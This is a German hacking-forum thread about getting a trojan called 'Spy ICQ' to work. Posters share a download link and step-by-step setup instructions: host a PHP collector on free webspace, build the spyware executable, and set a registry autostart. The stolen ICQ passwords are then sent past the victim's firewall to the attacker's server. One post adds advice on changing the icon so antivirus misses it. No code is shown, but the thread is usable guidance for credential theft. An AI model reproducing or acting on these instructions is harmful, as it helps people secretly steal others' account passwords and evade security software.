Ergebnis 1 bis 5 von 5
  1. #1
    Anfänger
    Registriert seit
    02.12.2007
    Beiträge
    5

    Standard [b]Spy Icq problem[/b]

    :idea: Hi,

    ich habe mir mal vor kurzem Spy icq runter geladen und dies wie in der Anleitung angeben versucht.

    Ich habe zuerst einen FTP- Server bei funpic erstellt und dort die Spy.php datei hochgeladen. Dann habe ich Spy icq angemacht und denn Link vom FTP-Server dort eingefügt, so bis dahin war alles ok.

    Nachdem ich fertig war habe ich einen Selbstversuch gestartet um zu gucken ob ich mein eigenes PW sehen kann. Die Datei die erstellt wurde durch das klicken auf mein Trojaner oder so. Die *txt datei habe ich mir denn runtergeladen.

    So da war nun mein Problem meine Icq-Nr stand zwar drin aber nicht das PW.

    Kann mir jeamnd helfen. :?:

  2. #2
    W32.Klez
    Registriert seit
    25.11.2007
    Beiträge
    418

    Standard

    cool uppe mal icq spy plss

  3. #3
    Anfänger
    Registriert seit
    02.12.2007
    Beiträge
    5

    Standard

    http://rapidshare.de/files/37966663/Spy_ICQ.rar.html

    Der Text gehört da noch zu.

    hi, biete ein programm mit dem man die icq passwörter eines rechners ganz einfach an der firewall vorbei spionieren kann!
    das programm wird vom antiviren programm nicht erkannt ...
    habs getestet, es funktioniert wirklich!!!
    und so funktionierts:
    ----------------------
    1: erstelle dir einen freespace account am besten bei www.funpic.de oä. anbieter (welcher php unterstützt)
    2: lade die datei "spy.php" auf deinen webspace (und gebe ihr ggf. chmod 777)
    3: starte das programm "SpYCQ.exe" und gebe dort den direkten pfad zu der *.php datei ein (zb. www.meinWebspace.de/spy.php)

    mittels der autostart option kannst du noch einstellen ob der server einen autostart eintrag in die registry setzen soll - wenn du diese dinge getan hast drücke auf "create" und wähle dein zielverzeichnis in welches das spyware programm gespeichert werden soll!

    und das wars schon nachdem jmd das programm geöffnet haben sollte werden die icq passwörter ausgelesen und an der evtl. vorhandenen firewall vorbeil auf euren server gesendet in dem ihr dann die passwörter in dem file spycq.txt einsehen könnt!
    ----------------------

    Wird anber trotzdem enddeckt musst du dann das Icon changen und nochmal so änders das er nicht von wirden erkannt wird.

  4. #4
    Bad Times Virus Avatar von Sirius.GER
    Registriert seit
    17.08.2007
    Beiträge
    562

    Standard

    Kann es sein, das du vllt dein PW net auf deinem PC gespeichert hast??

    Weil das PW muss gespeichert sein, falls das net is, dann ad mich mal in icq ;-)


    MfG Sirius

  5. #5
    Anfänger
    Registriert seit
    02.12.2007
    Beiträge
    5

    Standard

    So habe es jetzt hinbekommen vielleicht liegt es auch daran da es nur bei 5.1 geht. Weil da hat es aufeinmal geklappt.

    Danke für die Hilfe!!!!

    MFG---> DUO

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •